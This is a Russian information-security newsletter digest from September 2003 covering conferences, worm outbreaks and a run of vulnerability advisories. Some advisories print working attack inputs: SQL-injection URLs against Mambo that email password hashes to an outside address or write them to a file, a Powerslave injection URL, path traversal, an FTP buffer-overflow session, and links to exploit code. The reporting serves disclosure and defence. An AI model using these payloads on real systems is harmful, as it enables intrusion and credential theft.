Рассылка закрыта
При закрытии подписчики были переданы в рассылку "Информационная безопасность: новости, статьи, обзоры" на которую и рекомендуем вам подписаться.
Вы можете найти рассылки сходной тематики в Каталоге рассылок.
15 новостей по информационной безопасности каждый день
Информационный Канал Subscribe.Ru |
30 сентября-2 октября пройдет конференция "Информационная безопасность корпоративных сетей"
22 сентября | Рубрика: Технологии безопасности. Организации разработчики, интеграторы. События, семинары, конференции, датыКомпания Rainbow Technologies, поставщик решений в области информационной безопасности, объявила о проведении 30 сентября – 2 октября 2003 г. Второй практической конференции «Информационная безопасность корпоративных сетей». Она пройдет в рамках Четвертой Всероссийской научно-практической конференции «Информационные технологии в России», которая состоится во время крупнейшей национальной ИT-выставки Softool 2003 30 сентября – 2 октября 2003 года на ВВЦ в Малом конференц-зале павильона №69.
С докладами выступят руководители и ведущие специалисты компаний, предлагающих решения по информационной безопасности на российском рынке. Также приглашены представители Московского Комитета по Науке и Технологиям, Комитета Государственной думы по безопасности, Управления К и других законодательных органов РФ.
Конференция даст возможность слушателям ознакомиться с новыми решениями в области средств контентного анализа для защиты корпоративной электронной почты, аутсорсинга, средств аутентификации, криптографической защиты информации и другими практическими аспектами применения новейших технологий и разработок в этой области.
Во время конференции будут работать секции:
- Информационная безопасность в XXI веке. Новые проблемы – новые тенденции.
- Политика безопасности в современной компании. Комплексные системы защиты информации. Аутсорсинг.
- Антивирусное программное обеспечение. Средства мониторинга и фильтрации электронной почты и web-ресурсов.
- Защита периметра сети.
- Аутентификация. Электронно-цифровая подпись. Криптографическая защита информации.
- Системы защиты от несанкционированного доступа.
Регистрация выступающих и слушателей на конференцию проводится на сайте компании Rainbow Technologies.
0Для борьбы с новым червем W32/Gibe.C выпущена бесплатная утилита
22 сентября | Рубрика: Технологии безопасности. Организации разработчики, интеграторы.Вариант "С" червя Gibe (W32/Gibe.C), обнаруженный
еще 18 сентября, стал вирусом, наиболее часто обнаруживаемым на компьютерах
пользователей с помощью бесплатной онлайновой антивирусной программы Panda
ActiveScan. В связи с растущим количеством заражений компания Panda Software
выпустила бесплатную утилиту PQREMOVE, которая определяет и уничтожает эту
вредоносную программу. Утилиту можно скачать с сайта компании по адресу
http://www.pandasoftware.com/download/utilities/.
Зараженное письмо имеет различные характеристики и имитирует стиль веб
страниц компании Microsoft. Для большего правдоподобия среди отправителей письма
могут фигурировать те или иные службы Microsoft: MS Technical Assistance, MS
Customer Support и т.д. К письму прикреплен файл, который и содержит червя
Gibe.С. Названия файла варьируются (например, Q591362.EXE). Если запустить этот
файл, откроется серия окон, имитирущих процесс установки специального патча. В
действительности, окна маскируют действия, выполняемые этим червем. Среди
прочего, Gibe.С блокирует программу редактирования реестра Windows, чтобы не
допустить удаления новых точек вода, предварительно добавленных в реестр червем.
Также Gibe.C показывает письмо, целью которого является получение
конфиденциальной информации о пользователе. Gibe.C блокирует работу некоторых антивирусных программ и межсетевых экранов,
что делает зараженную машину беззащитной перед атаками хакеров и вредоносными
программами. Gibe.C использует две уязвимости в браузере Microsoft Internet Explorer для
того, чтобы самозапуститься в тот момент, когда пользователь просматривает
зараженное письмо в окне быстрого просмотра. И, наконец, этот червь
распространяется через каналы IRC и систему файлообмена KaZaA.
Опасный вирус "представляется" службой поддержки Microsoft
22 сентября | Рубрика: Проблемные ситуации, информационная преступность, сетевые войныСлужба мониторинга вирусной активности ЗАО "ДиалогНаука" сообщила о начале достаточно быстрого распространения в сети Интернет новой разновидности червя из семейства Gibe. Новый почтовый червь массовой рассылки, названный другими антивирусными вендорами Gibe.F или Swen, распространяется по электронной почте, используя собственную реализацию протокола SMTP, а также по файлообменной сети KaZaa и сети диалогового общения в Интернете IRC.
Программный модуль червя попадает на компьютеры пользователей с почтовым сообщением, отправленным якобы от имени компании Microsoft. Тема сообщения New Microsoft Patch и прилагаемый к письму текст предлагают пользователям программных продуктов корпорации установить на компьютерах новейший кумулятивный патч к MS Internet Explorer, MS Outlook и MS Outlook Express. Приходящее с письмом вложение, в котором содержится исполняемый модуль червя, имеет длину 106496 байт и его название генерируется червем случайным образом, начинаясь с символов i, p, q, и содержит расширение .EXE.
Запуск червя на компьютере при отсутствии антивирусных программ или в случае несвоевременного обновления вирусных баз возможен без участия пользователя, поскольку червем используется достаточно старая брешь в программе Microsoft Internet Explorer.
Будучи активированным, червь производи в пораженной системе следующие действия:
- демонстрирует на экране дисплея несколько ложных сообщений якобы от имени компании Microsoft
- помещает свою копию в директорию Windows и обеспечивает доступ к ней,
модифицировав соответствующую реестровую запись
для распространения по сети IRC помещает в директорию \Mirc файл Script.ini, после чего становится доступным всем пользователям системы после осуществления соединения пораженного червем компьютера с сервером IRC - для распространения по файлообменной сети KaZaa создает собственную папку со случайным названием и прописывает ссылку к ней в соответствующий ключ реестра
- останавливает некоторые антивирусные программы и брандмауэры.
Правозащитники: интернет-цензура достигла беспрецедентного уровня
22 сентября | Рубрика: Информационая безопасность общественной коммуникации, личности.Британские правозащитники опубликовали исследование, доказывающее, что сетевые
ограничения и надзор за коммуникациями во всем мире достигли беспрецедентного
уровня. Соответствующее исследование "Silenced" ("Заткнули рот") проводилось
интернет-экспертами и правозащитниками по поручению организаций Privacy
International и GreenNet Educational Trust в течение последнего года более чем в
пятидесяти странах.
По мнению авторов исследования, ущемлением свободы
слова в Сети и введением технологических и регулятивных стандартов надзора за
телекоммуникациями сетевое сообщество обязано в первую очередь Соединенным
Штатам и Великобритании, которые первыми и наиболее активно выступали за
подобные меры интернет-регулирования. В большинстве регионов сетевая цензура
стала обычным делом.
Как отмечают эксперты, "11 сентября 2001 года
предоставило правительствам многих стран повод внедрить ограничения свободы
слова, которым граждане прежде противились". Кроме того, западные державы
способствуют распространению цензуры в развивающихся странах, так как последние
с Запада получают технологии и оборудование, необходимые для органиации надзора
за телекоммуникациями. Без помощи Запада, утверждают эксперты, развивающимся
странам не удалось бы столь успешно внедрять цензуру. В исследовании
подчеркивается также, что в последние годы с точки зрения ограничений свободы
слова и цензуры корпорации вполне способны составить властям конкуренцию.
Эксперты, тем не менее, упоминают некоторые позитивные тенденции: во
многих странах принимаются законы о защите конфиденциальности, создаются
технологии, обеспечивающие защиту анонимности, а разница законов в различных
странах обеспечивает диссидентам некоторую свободу маневра. С точки зрения
знания технологий и умения ими пользоваться организации, ущемляющие права
человека, догоняют активистов.
3
26 сентября пройдет cеминар "Проблемы противодействия компьютерной преступности"
22 сентября | Рубрика: Технологии безопасности. Организации разработчики, интеграторы. События, семинары, конференции, датыЦентр исследования проблем компьютерной преступности(Computer Crime Research
Center) при Гуманитарном университете "ЗИГМУ", при содействии Центра по изучению
транснациональной преступности и коррупции при Американском
университете (Вашингтон, США), проводит международный
научно-практический семинар на тему "Проблемы противодействия компьютерной
преступности".
Участие в семинаре является бесплатным при условии
предварительной
записи.
Предыдущий семинар, проходивший 17 ноября
2001 в г.Запорожье, Украина, вызвал большой интерес ученых криминологов и
криминалистов, сотрудников СБУ, МВД, Прокуратуры, а также представителей
коммерческих структур. В 2001 г. участники семинара активно поддержали
инициативу проведения второго научно-практического семинара в 2003 году.
Задачей научно-практического семинара является обсуждение широкого круга
актуальных проблем противодействия компьютерной преступности, включая
экономические, правовые, организационные и технические вопросы информационной
безопасности.
Целью семинара является обмен опытом по вопросам борьбы и
противодействия компьютерной преступности, установление и развитие деловых
контактов, ознакомление с идеями, подходами и конкретными результатами решения
теоретических и практических задач. Основной формой работы семинара будут
выступления, дискуссии и проведение круглого стола.
Названия докладов и
список выступающих опубликован на: http://www.crime-research.ru/
4
Microsoft и компьютерная безопасность: подробности
22 сентября | Рубрика: Технологии безопасности. Организации разработчики, интеграторы.Российское подразделение корпорации Microsoft открыло сайт, посвященный проблемам компьютерной безопасности. Главной целью сайта, расположенного по адресу www.microsoft.com/rus/SecureInfrastructure/, будет ознакомление пользователей и специалистов в сфере информационных технологий с возможностями продуктов Microsoft по повышению безопасности компьютерных систем всех уровней. Там можно найти информацию о новых продуктах Microsoft, а также образовательных программах и семинарах по вопросам информационной безопасности.
Борьба Microsoft за безопасность
В Microsoft приложили максимум усилий, чтобы сделать эту систему максимально надежной и безопасной. Большинство системных компонентов и служб сконфигурированы по умолчанию в режиме максимальной безопасности. Именно поэтому в Microsoft позиционируют Windows Server 2003 как основу современной безопасной информационной инфраструктуры. Еще до конца нынешнего года Microsoft выпустит пакет Office 2003, при разработке которого безопасность также значилась в числе приоритетов.
При этом в Microsoft не собираются останавливаться на достигнутом. В ходе своего недавнего выступления, озаглавленного "Инновации или застой: Технологическая индустрия на перепутье", генеральный директор Microsoft Стив Баллмер отметил, что сейчас вся индустрия ИТ находится в начале нового этапа своего развития, причем проблемам обеспечения безопасности на этом этапе принадлежит ключевая роль.
По словам Баллмера, в настоящее работа по повышению безопасности продуктов Microsoft ведется по нескольким направлениям. Во-первых, компания создает средства, позволяющие оперативно идентифицировать и устранять имеющиеся в ПО дыры и уязвимости. Во-вторых, компания намерена активно работать над тем, чтобы установка обновлений, связанных с безопасностью, стала обыденной практикой как среди обычных пользователей, так и в корпорациях. Для этого компания предпримет максимум усилий по упрощению процесса поиска и установки необходимых заплаток. Наконец, Microsoft планирует уделять еще больше внимания превентивным мерам, направленным против вирусных и хакерских атак. Для этого в новые продукты компании будут встраиваться надежные средства отражения и профилактики таких угроз, как хакеры и вирусы.
Спустя два года: Что сделано?
В рамках программы "Trustworthy Computing" важным элементом повышения надежности программного обеспечения стали не только создание инструментов для контроля за безопасностью ПО, но и постоянный контакт с партнерами компании и заказчиками. С Microsoft сотрудничали сообщества пользователей, созданные в рамках программ Joint Development Program, Customer Preview Program и Rapid Adoption Program. Была введена новаторская программа Enterprise Engineering Center (EEC), которая обеспечивала практические испытания ПО в разнородных системах заказчиков.
Были внедрены службы Software Update Services, ставшие инструментом управления безопасностью для корпоративных клиентов. С помощью служб обновления системные администраторы получили возможность оперативного обновления ПО на серверах и рабочих станциях. Был выпущен продукт Microsoft Baseline Security Analyzer, позволяющий проверить ОС Windows 2000/XP/2003 на предмет наличия уязвимостей, а также предоставляющий возможность контролировать наиболее распространенные настройки безопасности.
Компания Microsoft уделила также внимание настройкам "по умолчанию" новой версии операционной системы Windows Server 2003. В этой ОС "заводские" установки направлены на обеспечение наибольшей безопасности. Дальнейшая настройка ОС по-прежнему может производиться по желанию системного администратора, в соответствии с требованиями компании, однако за счет безопасности системы "по умолчанию" снижается число возможных уязвимостей, которые могут оказаться "вне поля зрения" администраторов системы.
Полезную информацию для разработчиков Microsoft дает система отправки отчетов об ошибках в операционных системах Windows 2000/XP/03 и офисных пакетах. Это дает компании более ясную картину того, какие проблемы испытывают пользователи. Инструментом обратной связи с Microsoft является и служба обновлений Microsoft Windows Update, позволяющая скачивать обновления операционной системы и программного обеспечения, в том числе и необходимые инструменты для повышения безопасности, заплатки для программ и т.д.
Однако в Microsoft считают, что заботиться о безопасности должны не только системные администраторы, но и обычные пользователи. Именно для ознакомления пользователей с новыми возможностями ПО от Microsoft была открыта новая программа SecureInfraStructure.
Инициатива SecureInfrastructure
Девизом нового сайта Microsoft является фраза: "Пора сменить код". На место устаревшим системам с серьезными проблемами в области безопасности и надежности должны придти современные программные платформы. В их основе должны лежать операционные системы Windows Server 2003 и Windows XP, офисные продукты серии Office 2003 и пакета ISA Server 2000. Такое решение обеспечивает защиту данных от несанкционированного доступа, бесперебойную работу всей ИТ-инфраструктуры и защиту от спама, вирусов и внешних атак.
На сайте также доступны справочная информация о построении безопасной информационной инфраструктуры на базе решений Microsoft, а также описание учебных программ для специалистов в области ИТ, некоторыми из которых можно воспользоваться бесплатно. В частности, все покупатели Windows Server 2003 смогут бесплатно обучить своих специалистов по курсам Designing Security for Microsoft Networks, Fundamentals of Network Security, Deploying and Managing Microsoft Internet Security and Acceleration Server 2000.
5Исправлена дыра в Sendmail
22 сентября | Рубрика: Технологии безопасности. Организации разработчики, интеграторы.Разработчики популярного почтового сервера Sendmail завершили работу над версией 8.12.10 этого пакета. Ее главным отличием стала исправленная ошибка переполнения буфера, потенциально пригодная для удаленного использования. Ошибка, связанная с обработкой адресных полей писем была обнаружена Михалем Залевски, а патч подготовил Тодд Миллер из компании Courtesan Consulting. Кроме этого, в Sendmail была исправлена ошибка переполнения в модуле обработки наборов правил (ruleset) пересылки почты и устранены другие недоработки. С полным списком изменений можно ознакомиться здесь. Нужно отметить, что в последнее время дыры в Sendmail обнаруживаются с завидной регулярностью.
6Переполнение буфера в OpenSSH в StoneGate engine
22 сентября | Рубрика: Дыры и патчи программ и операционных сред Проблемные ситуации, информационная преступность, сетевые войны
Программа: Stonesoft StoneGate High Availability 2.x Опасность: Критическая Наличие эксплоита: Нет Описание: Переполнение буфера обнаружено в OpenSSH в StoneGate engine. Удаленный атакующий может выполнить DoS нападение или скомпрометировать уязвимую систему. StoneGate engine уязвим к недавно обнаруженной уязвимости в OpenSSH сервере. URL производителя:http://www.stonesoft.com Решение: Установите обновленную версию программы (2.2.2 для Intel и S390 и 2.0.11 для SPARC платформ) которую предполагается выпустить в начале октября. |
Sql инъекция в Powerslave Portalmanager
22 сентября | Рубрика: Дыры и патчи программ и операционных сред Проблемные ситуации, информационная преступность, сетевые войны
Программа: Powerslave Portalmanager 4.3 Опасность: Низкая Наличие эксплоита: Да Описание: Уязвимость обнаружена в Powerslave Portalmanager. Удаленный пользователь может получить информацию из базы данных. Удаленный пользователь может представить URL, содержащий произвольные SQL команды после поля sql-id, чтобы получить информацию о структуре базы данных. Пример/Эксплоит: http://example.com/powerslave,id,10;,nodeid,,_language,uk.html | |- ; or modified querys and table-numbers. Error: Could't find article! SELECT example_table.* FROM example_table WHERE example_table.ID=10; URL производителя: http://www.flyingdog.biz/flyingdog/powerslave,id,2,nodeid,,_language,de.html Решение: Установите обновленную версию программы: http://www.flyingdog.biz/flyingdog/powerslave,id,6,_language,de,_country,,nodeid,6.html http://www.flyingdog.biz/flyingdog/powerslave,id,6,nodeid,,_language,uk.html |
Межсайтовый скриптинг в Macromedia ColdFusion
22 сентября | Рубрика: Дыры и патчи программ и операционных сред Проблемные ситуации, информационная преступность, сетевые войны
Программа: ColdFusion 5.0-6.1 Опасность: Низкая Наличие эксплоита: Нет Описание: Уязвимость в проверке правильности входных данных обнаружена в Macromedia ColdFusion в обработчике ошибок по умолчанию. Удаленный пользователь может выполнить XSS нападение. Удаленный атакующий может внедрить произвольный код сценария в заголовок HTTP refer, чтобы выполнить XSS нападение. Уязвимы сайты использующие ColdFusionMX Site-Wide Error Handler страницу или ColdFusionMX Missing Template Handler страницу. URL производителя: http://www.macromedia.com/devnet/security/security_zone/mpsb03-06.html Решение: Установите соответствующие заплаты: 1. для ColdFusion MX 6.0 (All editions), обновите до 6.1: http://www.macromedia.com/software/coldfusion/productinfo/upgrade/ 2. Затем для ColdFusion MX 6.1 (All edtions), установите 6.1 Default Site-wide Error Handler page (12 KB ZIP): http://download.macromedia.com/pub/security/coldfusion/61/mpsb03-06_6_1.zip Для ColdFusion 5.0 и более ранних версий (All edtions), установите следующий Site-wide Error handler page (1 KB ZIP): http://download.macromedia.com/pub/security/coldfusion/mpsb0 3-06_errorpage.zip |
Множественные уязвимости в Mambo Site Server
22 сентября | Рубрика: Дыры и патчи программ и операционных сред Проблемные ситуации, информационная преступность, сетевые войны
Программа: Mambo Site Server 4.0.14 Опасность: Критическая Наличие эксплоита: Да Описание: Несколько уязвимостей обнаружено в Mambo Site Server. Удаленный пользователь может выполнить произвольные SQL команды на основной базе данных. Удаленный пользователь может раскрыть инсталляционный путь. Mambo не проверяет параметр '$id' в сценарии "banners.php" и параметр “bid” в сценарии banners.php. Если целевая система использует MySQL 4.x, то удаленный пользователь может представить специально обработанный URL, который заставит целевую систему отправить по почте хеши паролей. Пример (отправляет хеш MD5 паролей для пользователя с id =1): http://localhost/mambo/emailfriend/emailarticle.php? submit=submit&email=lifofifo@hackingzon e.org&youremail=webmaster@hackingzone.org&id=100 UNION select username,email,password from mos_users where id=1Также удаленный пользователь может выполнить произвольные SQL команды на целевом сервере: http://localhost/mambo/banners.php?op=click&bid=100 UNION select password from mos_users where 1=1 into outfile 'c:/apache2/htdocs/mos.txt'Также сценарий 'contact.php' может использоваться для трансляции анонимных почтовых сообщений. Пример: http://localhost/mambo/contact.php?op=sendmail&text=this is spam&from=none&name=Admin&email_to=lifofifo@hackingzone.org&sitename=ha& URL производителя:http://www.mamboserver.com/ Решение: Mambo 4.0.14 не уязвим к неавторизованному релею почты: http://prdownloads.sourceforge.net/mambo/MamboV4.0.14.tar.gz. В качестве временно решения проблемы, используйте базу данных MySQL 3.x, которая не уязвима к нападениям SQL инъекции. |
Раскрытие чувствительной информации в TM-POP3 сервере
22 сентября | Рубрика: Дыры и патчи программ и операционных сред Проблемные ситуации, информационная преступность, сетевые войны
Программа: TM-POP3 Server 2.x Опасность: Низкая Наличие эксплоита: Да Описание: Уязвимость обнаружена в TM-POP3 сервере. Злонамеренный локальный пользователь может получить доступ к чувствительной информации. Программа хранит имена пользователей и пароли почтового сервера в открытом виде в следующем ключе реестра: HKEY_LOCAL_MACHINE\SOFTWARE\TMSOFT\Pop3Server URL производителя:http://www.tmsoft.com/tmpop3.asp Решение: Ограничьте доступ к системе только доверенным пользователям. |
Переполнение буфера и доступ к произвольным файлам в Plug and Play Web Server
22 сентября | Рубрика: Дыры и патчи программ и операционных сред Проблемные ситуации, информационная преступность, сетевые войны
Программа: Plug and Play Web Server 1.0002c Опасность: Высокая Наличие эксплоита: Да Описание: Две уязвимости обнаружено в Plug and Play Web Server. Злонамеренный пользователь может раскрыть чувствительную информацию и скомпрометировать уязвимую систему.
Пример/Эксплоит: 1. http://[victim]/././existing_file2. dir [Ax509] ls [Ax509] delete [Ax509] mkdir [Ax509] DELE [Ax509] RMD [Ax509] MKD [Ax509] Example: -------------------- ftp> o 127.0.0.1 Connected to 127.0.0.1. 220 Plug and Play Web Server V1.0 User (127.0.0.1:(none)): anonymous 331 Password required for anonymous Password: 230 User anonymous logged in ftp> dir AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 200 PORT command successful Connection closed by remote host. ftp> o 127.0.0.1 > ftp: connect :Unknown error number ftp> -------------------- URL производителя:http://www.pandpsoftware.com/ Решение: Ограничьте доступ к FTP серверу только доверенным пользователям. Запретите доступ анонимному Web пользователю к чувствительным файлам на системе на уровне файловой системы. |
Уязвимость форматной строки в в lpd службе в IBM AIX
22 сентября | Рубрика: Дыры и патчи программ и операционных сред Проблемные ситуации, информационная преступность, сетевые войныПрограмма: IBM AIX 4.3, 5.1-5.2
Опасность: Низкая
Наличие эксплоита: Нет
Описание: Уязвимость обнаружена в IBM AIX. Локальный пользователь может поднять свои привилегии или вызвать отказ в обслуживании.
Уязвимость связанна с ошибкой форматной строки в lpd службе. Пользователь с привилегиями группы "printq" может выполнить произвольный код на системе с root привилегиями.
URL производителя: http://www.ibm.com
Решение: Установите соответствующие обновления:
1. AIX 4.3.3 (IY45250):
http://techsupport.services.ibm.com/rs6k/fixdb.html
2. AIX 5.1.0 (IY46256):
http://techsupport.services.ibm.com/server/aix.fdc
3. AIX 5.2.0 (IY45344):
http://techsupport.services.ibm.com/server/aix.fdc
Переполнение буфера при обработке архивных файлов в Midnight Commander
22 сентября | Рубрика: Дыры и патчи программ и операционных сред Проблемные ситуации, информационная преступность, сетевые войны
Программа: Midnight Commander 4.5.52 - 4.6.0 Опасность: Низкая Наличие эксплоита: Да Описание: Уязвимость обнаружена в Midnight Commander. Злонамеренный архивный файл может заставить приложение выполнить произвольный код. 'vfs/direntry.c' использует неинициализированный буфер для обработки символьных ссылок (symlinks) в архивных файлах. Недостаток расположен в функции vfs_s_resolve_symlink(). Удаленный пользователь может сконструировать злонамеренный архив, который выполнит произвольный код с привилегиями пользователя просматривающего архив, используя Midnight Commander. Пример/Эксплоит: URL производителя: http://www.securitylab.ru/_exploits/exp.tgz Решение: Не используйте Midnight Commander для просмотра архивных файлов. |
Отказ в обслуживании против Sun Java SDK
22 сентября | Рубрика: Дыры и патчи программ и операционных сред Проблемные ситуации, информационная преступность, сетевые войныПрограмма: Sun Java SDK 1.4.x Sun Java JRE 1.3.x, Sun Java JRE 1.4.x, Sun Java SDK 1.3.x
Опасность: Низкая
Наличие эксплоита: Нет
Описание: Уязвимость обнаружена в Sun Java SDK. Злонамеренный пользователь может вызвать отказ в обслуживании.
Некоторые Sun классы не в состоянии правильно обработать некоторые параметры. Один из уязвимых классов - "sun.misc.MessageUtils.toStdout”, который не в состоянии обработать пустой объект. Злонамеренный пользователь может заставить SDK приложение обработать XSL шаблон, чтобы вызвать отказ в обслуживании на уязвимой системе.
URL производителя:http://java.sun.com/products/java-media/jmf/index.html
Решение:Ограничьте доступ к приложению только доверенным пользователям, способных обрабатывать XSL шаблоны.
15Уязвимость форматной строки в в tsm службе в IBM AIX
22 сентября | Рубрика: Дыры и патчи программ и операционных сред Проблемные ситуации, информационная преступность, сетевые войны
Программа: IBM AIX 5.x Опасность: Средняя Наличие эксплоита: Нет Описание: Уязвимость обнаружена в IBM AIX. Злонамеренный пользователь может скомпрометировать удаленную систему. Уязвимость форматной строки обнаружена в tsm службе (terminal state management). Эксплуатируя команду "login", злонамеренный пользователь может получить root привилегии. Эксплуатируя команды "su" и "passwd", локальный пользователь может получить поднятые привилегии. URL производителя: http://techsupport.services.ibm.com/ Решение: Установите APAR (IY47764) заплату: |
Удаленный отказ в обслуживании против IBM DB2 базы данных
22 сентября | Рубрика: Дыры и патчи программ и операционных сред Проблемные ситуации, информационная преступность, сетевые войны
Программа: DB2 Universal Database 7.x Опасность: Низкая. Наличие эксплоита: Нет Описание: Уязвимость обнаружена в IBM DB2 базе данных. Удаленный атакующий может аварийно завершить работу Discovery Service. Удаленный пользователь может послать датаграмму размером более 20Кб к Discovery Service (523/udp порт), чтобы аварийно завершить работу Discovery Service. URL производителя:http://www.ibm.com Решение: Установите Apply DB2 7.2 FixPak 10a: http://www-3.ibm.com/cgi-bin/db2www/data/db2/udb/winos2unix/support/download.d2w/report#V7LFP |
Отказ в обслуживании против Microsoft BizTalk Server
22 сентября | Рубрика: Дыры и патчи программ и операционных сред Проблемные ситуации, информационная преступность, сетевые войныПрограмма: Microsoft BizTalk Server 2000-2002
Опасность: Низкая
Наличие эксплоита: Нет
Описание: Несколько уязвимостей обнаружено в Microsoft BizTalk Server. Удаленный пользователь может загрузить злонамеренные файлы, чтобы аварийно завершить работу приложения.
Несколько уязвимостей обнаружено в конфигурации виртуальных директорий, образованных при инсталляции BizTalk сервера. Уязвимы каталоги '/BizTalkServerDocs/' для документов и '/BizTalkServerRepository/' для XML файлов.
Удаленный авторизованный пользователь может загрузить HTML документацию, которая содержит злонамеренный код сценария, который будет выполнен в браузере целевого пользователя, просматривающего документацию. Удаленный пользователь может загрузить на сервер злонамеренный XML файл, чтобы аварийно завершить работу приложения.
URL производителя: http://www.microsoft.com
Решение: Microsoft выпустил Knowledge Base, в котором рассказывается о способе устранения обнаруженной проблемы: http://support.microsoft.com/default.aspx?scid=kb;en-us;824935
18Локальное переполнение буфера в hztty
22 сентября | Рубрика: Дыры и патчи программ и операционных сред Проблемные ситуации, информационная преступность, сетевые войныПрограмма: hztty
Опасность: Средняя
Наличие эксплоита: Да
Описание: Два переполнения буфера обнаружены в hztty. Локальный пользователь может выполнить произвольный код на системе с поднятыми привилегиями.
Пример/Эксплоит: http://securitylab.ru/_exploits/hztty.c.txt
URL производителя:http://www.debian.org
Решение: Debial Linux выпустил исправление для своего релиза: http://www.securitylab.ru/?ID=40358
19Открытый пароль в Half-Life 'rcon' Remote Console
22 сентября | Рубрика: Дыры и патчи программ и операционных сред Проблемные ситуации, информационная преступность, сетевые войны
Программа: Half-Life 'rcon' Remote Console Опасность: Низкая Наличие эксплоита: Не нужен Описание: Уязвимость обнаружена в Half-Life 'rcon' Remote Console. Программа передает пароль в открытом виде. Удаленный пользователь, способный контролировать сетевой трафик между целевым пользователем и Half-Life/Counter-Strike сервером, может получить пароль целевого пользователя. URL производителя: http://half-life.sierra.com/ Решение: Способов устранения обнаруженной уязвимости не существует в настоящее время. Подключайтесь к игровому серверу только через доверенные сети. |
Удаленное переполнение буфера в Knox Arkeia Pro
22 сентября | Рубрика: Дыры и патчи программ и операционных сред Проблемные ситуации, информационная преступность, сетевые войныПрограмма: Knox Arkei Pro 5.1.12
Опасность: Критическая
Наличие эксплоита: Да
Описание: Уязвимость обнаружена в Knox Arkeia Pro. Удаленный пользователь может получить root привилегии на системе.
Удаленный пользователь может послать специально сформированные данные к Knox Arkei, чтобы выполнить произвольный код на системе с root привилегиями.
Пример/Эксплоит: http://www.securitylab.ru/_exploits/knol.c.txt
URL производителя: http://www.arkeia.com/index.html
Решение: Ограничте доступ к серверу только из доверенных IP адресов.
21Удаленное выполнение произвольного кода в LSH (эксплоит)
22 сентября | Рубрика: Дыры и патчи программ и операционных сред Проблемные ситуации, информационная преступность, сетевые войныПрограмма: LSH 1.4.x - 1.5.x
Опасность: критическая
Наличие эксплоита: Да
Описание: Уязвимость обнаружена в LSH – бесплатной альтернативе OpenSSH. Удаленный пользователь может выполнить произвольный код на уязвимой системе.
Переполнение обнаружено в 'read_line.c'. Ниже рабочий код, которых позволяет удаленному атакующему скомпрометировать уязвимый сервер.
Пример/Эксплоит: http://www.securitylab.ru/_exploits/lsh_exploit.c.txt
URL производителя:http://www.net.lut.ac.uk/psst/
Решение: Разрешайте подключения только из доверенных IP адресов. Дождитесь соответствующего исправления.
22ISC BIND блокирует работу службы VeriSign SiteFinder
22 сентября | Рубрика: Информационные ресурсыНа прошлой неделе VeriSign представила новый сервис, который перенаправляет любой запрос несуществующего доменного имени или просто ошибочно набранный адрес в строке браузера с расширениями .NET и .COM на 64.94.110.11, находящийся в распоряжении “Verisign”.
По этому адресу находится интернет-сайт sitefinder.verisign.com, принадлежащий самой компании, и который, возможно, составит конкуренцию крупнейшим поисковым машинам и каталогам, причем без каких-либо маркетинговых усилий.
На новую инициативу немедленно отреагировала Internet Software Consortium (ISC), производитель популярного DNS сервера BIND, который используется на 80% всех DNS-серверов в мире. Выпущенное исправление просто-напросто блокирует SiteFinder и перенаправляет браузер только на делегированные адреса. Если большинство их владельцев установят новый патч от ISC, рекламному начинанию VeriSign придётся туго.
23Юго-Восточная Азия создаст масштабную структуру для борьбы с хакерами, вирусописателями и пиратами
22 сентября | Рубрика: Технологии безопасности. Организации разработчики, интеграторы.Ассоцицация стран Юго-Восточной Азии объявила о намерении создать к 2005 году единую структуру по борьбе с пиратством и компьютерными вирусами. В задачу нового ведомства будет входить выявление слабых мест в системе компьютерной безопасности и предупреждение вирусных и хакерских угроз.
К 2005 году в рамках единой структуры ASEAN будут созданы специальные подразделения быстрого реагирования (Computer Emergency Response Teams, CERT). На них будут возложены обязанности по противодействию хакерским атакам и вирусным эпидемиям, а также ликвидации последствий этих событий. Сотрудники CERT будут взаимодействовать и со своими коллегами из региональных структур, связанных с обеспечением компьютерной безопасности.
24Эти и другие новости читайте на сайте Стра.тег
http://subscribe.ru/
E-mail: ask@subscribe.ru |
Отписаться
Убрать рекламу |
В избранное | ||